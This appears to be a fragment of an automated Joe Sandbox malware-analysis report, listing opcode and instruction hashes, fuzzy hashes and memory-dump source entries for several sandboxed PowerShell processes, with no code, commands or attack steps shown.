                                                              • Instruction ID: 758808b09bb5a88405bce355dd5dd6454bb966f61c6f5f3376d52d4a31d027d5
                                                              • Opcode Fuzzy Hash: 9d58a3984f0f91b11b7cdf5ead418d16964d4ea6485d86e7defa8a77464ea3d3
                                                              • Instruction Fuzzy Hash: 5A11B730A5D9854FE385F768882637837E2EF46745F5001B9D82EC72E3EE1C1C418B56
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
                                                              • Instruction ID: c6e776b1d00290aaf3c1325437fd10032b6f1d9f814e63457321aa80cfcb8812
                                                              • Opcode Fuzzy Hash: 066cba8b53df43cc294d8230771a219289238d614a0cd8bd707482a9e4ad6fb2
                                                              • Instruction Fuzzy Hash: E001A73011CB0C8FD744EF0CE051AA6B7E0FB85364F10052DE58AC3651D736E881CB45
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 285ff84c730328516bba6994da47670bfb3913f2f52820cd06fdb403fed966bd
                                                              • Instruction ID: 1b4288c8aca61276217f874e239c699e8bac56de29797f73454e54a1cfb18d10
                                                              • Opcode Fuzzy Hash: 285ff84c730328516bba6994da47670bfb3913f2f52820cd06fdb403fed966bd
                                                              • Instruction Fuzzy Hash: B401F43074DA494FE389EA3888A52B63293DFC9791F1081BAD41BC73E7DE2C58019751
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8c8d47abf644758186d703186f6626a286bb5ba42f79fee1b38071eb6c8fa14b
                                                              • Instruction ID: 46ab36374a1f1a158d8c73ce21c3548d4ecc902d9994790d97d5e21e8174bfc3
                                                              • Opcode Fuzzy Hash: 8c8d47abf644758186d703186f6626a286bb5ba42f79fee1b38071eb6c8fa14b
                                                              • Instruction Fuzzy Hash: BDF0963066DA485FE34AA73C841523436E1EF89B81F5000BED80DC73E7DE296C428B96
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7b694def646de92c6770dc6bc5d07d169b6758ce9bedb3495a8ba57723ba21a
                                                              • Instruction ID: 0ef2a9755260de5aa4d950196ea509caeabb30f27ddf0ccedcea64161445b46c
                                                              • Opcode Fuzzy Hash: c7b694def646de92c6770dc6bc5d07d169b6758ce9bedb3495a8ba57723ba21a
                                                              • Instruction Fuzzy Hash: F9F0303275C6048FDB4CAA1CF8429B5B3D1EB99321F10016EE48BC2696D92BF842CA85
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b00f6d85948ce642796d828a8b8d790efc77bbb2bf9c1de1813b7a72417c3fa8
                                                              • Instruction ID: ffd37e43a1b0de3ba1b210cbf30e80b33834ffa9e10656c50ee189bf582975b0
                                                              • Opcode Fuzzy Hash: b00f6d85948ce642796d828a8b8d790efc77bbb2bf9c1de1813b7a72417c3fa8
                                                              • Instruction Fuzzy Hash: 19F04430A5D5854FE39AF769845577836A1DF46385F5000B9D40DC72E3DF2D1C41CB56
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3a3657d59ed4a384374ca31c907f1b2bec76b0a0825fe2c2d7299f2f9ddcdef5
                                                              • Instruction ID: 512813f8462e74905256e0ceab4ce0d77a9ffb9310316b26a7023a0ca07fed51
                                                              • Opcode Fuzzy Hash: 3a3657d59ed4a384374ca31c907f1b2bec76b0a0825fe2c2d7299f2f9ddcdef5
                                                              • Instruction Fuzzy Hash: B8F0B42065C9444FE789E7388C6673437E2EF89785F1001BDD82BC73D3DE2818418B52
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2918907773.00007FF848D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D50000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848d50000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8b42e6c121ae07b4ec628f7c5d163f5063803b25abadfb57ee9e4f46d7484eed
                                                              • Instruction ID: daadb9c95a39e2912008d6d0267f81e0e0c8556f00fd687ead419f65f4496afc
                                                              • Opcode Fuzzy Hash: 8b42e6c121ae07b4ec628f7c5d163f5063803b25abadfb57ee9e4f46d7484eed
                                                              • Instruction Fuzzy Hash: 19E09222F0F92E0FF2AAF25C24197F8D2C1EF892A1FD401B7D80DD3286EE049C154289
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1ce43bffc4707631982079a35e1e57d03dc03385a17b2cca1c353f0167e9d9bf
                                                              • Instruction ID: ddc76aa120416c8e919674bad1c2e9eee1ecbc263a89b06a2bdff2018dd14779
                                                              • Opcode Fuzzy Hash: 1ce43bffc4707631982079a35e1e57d03dc03385a17b2cca1c353f0167e9d9bf
                                                              • Instruction Fuzzy Hash: 47F0EC3179C4494FD348E634C8516753396DB89351F10837DD46FC72D3EF2858818A96
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c7ede9794aca9ffcb85b6df49f53cc4e85c41943111edc28180d686e1d6174a
                                                              • Instruction ID: 2303df546ef44c0ddcb7c2c7c4e912f86e056184af7ea4f548d7719d06aba4b5
                                                              • Opcode Fuzzy Hash: 0c7ede9794aca9ffcb85b6df49f53cc4e85c41943111edc28180d686e1d6174a
                                                              • Instruction Fuzzy Hash: E4F0303074D9094FE345E62880996BA3293DFD9396F208576C40AC72EADE2D98469745
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7928784e08684f626e6fcab5309fd934c192ed4eed6ffc20bb274bb21ebb824d
                                                              • Instruction ID: af702dab5cf5f9744c4f26d3d436497c66b9c67f8541a1cdf669a1fad9229ce5
                                                              • Opcode Fuzzy Hash: 7928784e08684f626e6fcab5309fd934c192ed4eed6ffc20bb274bb21ebb824d
                                                              • Instruction Fuzzy Hash: 11E0863168960A8FD794DB58C4846B933A2FB54352F20833AC00AC7296DF3D5806D784
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7c368c93864ff1d7bc0de3b5af9e123066e4e011afef365157cfebd040083641
                                                              • Instruction ID: 7c426063bf84d0607bdf311cd0c0416cf7e55a8194f274bb8f6d186134e7d015
                                                              • Opcode Fuzzy Hash: 7c368c93864ff1d7bc0de3b5af9e123066e4e011afef365157cfebd040083641
                                                              • Instruction Fuzzy Hash: 47D02B31BCC4068FD714B624DC405B53391D348351F008379C44BC2287FA3C98C045C6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2917186742.00007FF848C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_7ff848c80000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aaf8a382f491b3a8328872aada4fff601e806fc89ce784f6968d36902f80652a
                                                              • Instruction ID: 56fd8a00fa89a19258ace1526ed754611e64b734dd15d6b731cdae667cdce807
                                                              • Opcode Fuzzy Hash: aaf8a382f491b3a8328872aada4fff601e806fc89ce784f6968d36902f80652a
                                                              • Instruction Fuzzy Hash: ABC08C10E1C8014BE254A128A4062786280DF08BC2F200075EE0DC22DBDC182C63418D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2726d7100ec766700c6ced5c5d7b42e32d9502d081d4884583b15acf8c13b3bd
                                                              • Instruction ID: 57237cf421a3af76776cd9843fac8a7e8f6d351934a18b1a68d6c799b20435d3
                                                              • Opcode Fuzzy Hash: 2726d7100ec766700c6ced5c5d7b42e32d9502d081d4884583b15acf8c13b3bd
                                                              • Instruction Fuzzy Hash: CFD13471D0FA8E5FEB55AB7868546B57BE0EF162A4F0800FAE04DD70D3EB18A809C355
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0d71eb5ea15c3656e2f7d22f9da9f75d26fd5b23fc666c4f2e5e2976ea62a39
                                                              • Instruction ID: 5fb8345fa1d4f6898f8dff9e43930bd42b5ff9afa15d0f7cc439a745e55a95bf
                                                              • Opcode Fuzzy Hash: b0d71eb5ea15c3656e2f7d22f9da9f75d26fd5b23fc666c4f2e5e2976ea62a39
                                                              • Instruction Fuzzy Hash: BCF05E3580CA8C8FDB95EF2898685E57FE0FF26205B1401EBE84DC7161DB21A958C785
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4639d4c9cf3dae17d093ccb82ca3ba020af210adf460e18a344bc8c328a3e3a1
                                                              • Instruction ID: 1f57a517567b8fc783804b741f4c81f7b6d31709dcd18d66852e6ef4f808fd00
                                                              • Opcode Fuzzy Hash: 4639d4c9cf3dae17d093ccb82ca3ba020af210adf460e18a344bc8c328a3e3a1
                                                              • Instruction Fuzzy Hash: DC31E53190CB488FDB58DB5CA8066B97BE0FBA9710F00426FE44993651DB31A855CBC6
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2860872004.00007FF848B7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848b7d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4a0fee6f73a2f65e931ba1308709eec403620e2b98a465b92515dbd64c4f775d
                                                              • Instruction ID: e6c178c68b92c01565fa1ef7422e9b82a948e16f017bd36fd0072b0278139e74
                                                              • Opcode Fuzzy Hash: 4a0fee6f73a2f65e931ba1308709eec403620e2b98a465b92515dbd64c4f775d
                                                              • Instruction Fuzzy Hash: 8441577080DBC49FE7569B38A841A523FF0EF56320F0601DFD488CB5A7C725A84AC792
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e00aa915d957e4cfddaf9c616dd036382bfe128f2acc94d66a816b3d4aa9d98b
                                                              • Instruction ID: a42f022d6f6dd3cfa217469fee397848372dc958e673e7a211bc1f54c481f5df
                                                              • Opcode Fuzzy Hash: e00aa915d957e4cfddaf9c616dd036382bfe128f2acc94d66a816b3d4aa9d98b
                                                              • Instruction Fuzzy Hash: 4831E57190DB888FDB59DF68984A6E93FF0EFA6321F0441ABD048C7163D6399849CB52
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction ID: 0f03e15030260991588b1b2485b7051d7196598e140a677e60203f1b5ab13b1b
                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                              • Instruction Fuzzy Hash: 7101677115CB0D8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3661DB36E882CB45
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eeb3670fd142af4759142e3194bf82ed724b8b37cdd28fb4e0447134ad8c2d4a
                                                              • Instruction ID: 8cb0fc8bc71e2aced9cc2718f30f4a600ea3d1b4a35caa5df40c20c746a7b4a7
                                                              • Opcode Fuzzy Hash: eeb3670fd142af4759142e3194bf82ed724b8b37cdd28fb4e0447134ad8c2d4a
                                                              • Instruction Fuzzy Hash: 5BF0BE32A0D6098FE698EB4CE405AE873E1FF54360B1500BAE01DC71A3CB2AEC44C788
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2953cf0b6c0ef3e9a3d77bd90a33ca2cbe58163aad0399d77657fd6920f5fc78
                                                              • Instruction ID: 3cb9ffed048acfe8abb308dffeac1a01e3f6391423b2a8f3adbe1669150537f2
                                                              • Opcode Fuzzy Hash: 2953cf0b6c0ef3e9a3d77bd90a33ca2cbe58163aad0399d77657fd6920f5fc78
                                                              • Instruction Fuzzy Hash: 90F0BE31A0D5488FE755EB0CE446AE873E0FF04320B1500B6E009C7063DB26AC54C794
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction ID: 195463db7dc087f650cdcb4d8f594801fc5eb560f661ee5cc9053a1d5fb510fc
                                                              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                              • Instruction Fuzzy Hash: 50E01A31B0C8088FDAA8EB0CE040AE973E2FB98371B1101B7E14ED7561CB26EC558B84
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71748acc3c01453aab5ad77b283be2f8662254592b61ed55f8a655d15498963f
                                                              • Instruction ID: c16d75e5021a2106a33e6e1e4f4762b7f004811b66b5643d07648ffabfe5f592
                                                              • Opcode Fuzzy Hash: 71748acc3c01453aab5ad77b283be2f8662254592b61ed55f8a655d15498963f
                                                              • Instruction Fuzzy Hash: 42E01A35808A4C8FDB48EF2898595E97BA0FB68215F0042ABE80DC7121EB719958CBC2
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2871573465.00007FF848D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848d60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fcfa4a106956aa1cdbc1b71995a1fc14cf364fb43ee566f58a83bad968d20f76
                                                              • Instruction ID: b0721e21651f4a91a47759ac147709c15e1e818fe279e5d6dbbeeedf9a2ce7bf
                                                              • Opcode Fuzzy Hash: fcfa4a106956aa1cdbc1b71995a1fc14cf364fb43ee566f58a83bad968d20f76
                                                              • Instruction Fuzzy Hash: 82B1F521D0EBCA0FE79BA63C1864271BFE1EF57650F0901FBD449D7193DA19AC0A835A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: K_^=$K_^@$K_^T$K_^U$K_^W$K_^Y
                                                              • API String ID: 0-440027145
                                                              • Opcode ID: 86c3768a94039caec6b132ffc58f392c1c7c0324f692fefc737e1f0a6517d45e
                                                              • Instruction ID: fddba37290a318b1e8ad7ffec8022c39873526d1be95721ccadac0bda7e572c5
                                                              • Opcode Fuzzy Hash: 86c3768a94039caec6b132ffc58f392c1c7c0324f692fefc737e1f0a6517d45e
                                                              • Instruction Fuzzy Hash: A62165B37585257EDA0676ADF8412E83BD0EF912B174512F3C258DB103DD24A4878998
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2866594167.00007FF848C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C90000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_7ff848c90000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: K_^$K_^$K_^$K_^$K_^
                                                              • API String ID: 0-3188868157
                                                              • Opcode ID: 2b24ddb36730c012f27860d4d80bef9697a42a4b939e3fdfc6113f16d73210f3
                                                              • Instruction ID: c025dad802198a9660a71ae08b5114cc5c6302723cf0888f0532a7925039d9a7
                                                              • Opcode Fuzzy Hash: 2b24ddb36730c012f27860d4d80bef9697a42a4b939e3fdfc6113f16d73210f3
                                                              • Instruction Fuzzy Hash: 7F215573E0D9C29FF3D6A63D585909A2FD0FF627A8B0900F6D099C70B3FA15580B9615
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2867585811.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848d30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: X7BR
                                                              • API String ID: 0-1240667675
                                                              • Opcode ID: 307fcdb4d0d7f525918269b39d1597fdf5c3efc0565d24588655997d17df2294
                                                              • Instruction ID: f5b723892d3eccf12025af99146550ee17e718110798a428572a4a2edc621bce
                                                              • Opcode Fuzzy Hash: 307fcdb4d0d7f525918269b39d1597fdf5c3efc0565d24588655997d17df2294
                                                              • Instruction Fuzzy Hash: 4ED10171D0FB8A5FFB95AB2868156B57BE0EF162A4F1800FBD04DC70D3EA189809C365
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3e1dd8699b25b8e9a4f5f8d8642d1f2eb5d2472c1f2024d83a75fd041057cb3e
                                                              • Instruction ID: e72eae8234c7eb6a05205ad28048fac9f124fdb4415ac690675c3e814678e894
                                                              • Opcode Fuzzy Hash: 3e1dd8699b25b8e9a4f5f8d8642d1f2eb5d2472c1f2024d83a75fd041057cb3e
                                                              • Instruction Fuzzy Hash: F021AE7694D6CA8FD757EB6898660E43FA0FF12294F0800F7D58CCB063EA185859879A
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92aa960d0d38a44407c6e34b7307d7e8095447a88d7efe8683a84719a59c5f90
                                                              • Instruction ID: fd48115555d4f2887e29001077d9c0c2c4811e18b40f4746a09a2164123c2f3b
                                                              • Opcode Fuzzy Hash: 92aa960d0d38a44407c6e34b7307d7e8095447a88d7efe8683a84719a59c5f90
                                                              • Instruction Fuzzy Hash: 4C11916180DBC64FDB879B748C255A57FB0FF17250F0901FBD488DB1A3DA199858C792
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 157d5a00bebe917f433e671beec53befc51af30d83f917bcf4723e18668d6268
                                                              • Instruction ID: 0fe7ede4c84d307c161f79edab2bd12ce44e335da7c43848a86744b183a93354
                                                              • Opcode Fuzzy Hash: 157d5a00bebe917f433e671beec53befc51af30d83f917bcf4723e18668d6268
                                                              • Instruction Fuzzy Hash: E5F0317540D7C98FDB469F2498654947FB0EF16210B0901E7D489CB062D7659D58CB92
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2858176701.00007FF848B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848b4d000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fc1dcd9456ccd98cb6a1b95f7e4d8cb3c679f5e075128fadff047d5093d0052
                                                              • Instruction ID: af6e7866be35129b8b332df75e39f9f32e80a67446e81f497c1251d766dadc7c
                                                              • Opcode Fuzzy Hash: 2fc1dcd9456ccd98cb6a1b95f7e4d8cb3c679f5e075128fadff047d5093d0052
                                                              • Instruction Fuzzy Hash: 6541043080DBC44FE7669B28AC429523FF0EF56320F1506DFD088CB5A7D729A846C7A2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5119785464e7533f11dbed727f9b7fea67062063727b8d3aa7189f03bc0dde43
                                                              • Instruction ID: 7929ccf5c76308467ab1832e8d6a048e4a9abec8ae5cd31f045cd8da04af4929
                                                              • Opcode Fuzzy Hash: 5119785464e7533f11dbed727f9b7fea67062063727b8d3aa7189f03bc0dde43
                                                              • Instruction Fuzzy Hash: 9931C53091CB488FDB58DB5CA8466A9B7E0FB98711F00422FE44DD3252DB71A855CBC2
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2645dabea9e1e5fe91e50606db418dae5834ccfa1fc10c24fd9d5e5a6f60df28
                                                              • Instruction ID: f3762684306278421aa5aaad1f60bc2653aa111b439f63dc36c9498f68466fe2
                                                              • Opcode Fuzzy Hash: 2645dabea9e1e5fe91e50606db418dae5834ccfa1fc10c24fd9d5e5a6f60df28
                                                              • Instruction Fuzzy Hash: F231D47190D7884FDB59DF68984A7E97FF0EF96321F0441AFD048C7162D638A84ACB51
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2863328404.00007FF848C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848C60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848c60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                              • Instruction ID: 4eb2ada9ab29e622916c17807bfbfc79cc04b2bc1181a3ef9b684f0d4e271a07
                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                              • Instruction Fuzzy Hash: 7001677115CB0D4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DB36E882CB45
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2867585811.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848d30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 86136773ba7ac4d94fc09e9042942c930efd2d10839d807ace836a6e270821ff
                                                              • Instruction ID: 0ebc7cbd4d57e20fcfdf9cea8b4b8c58554e9c6eb1c82a18b5367336c7210a3f
                                                              • Opcode Fuzzy Hash: 86136773ba7ac4d94fc09e9042942c930efd2d10839d807ace836a6e270821ff
                                                              • Instruction Fuzzy Hash: 08F0B431A0D9058FE659EB4CE4055E473E1FF54360B1500B7E01DC7163CB29EC44C788
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2867585811.00007FF848D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ff848d30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
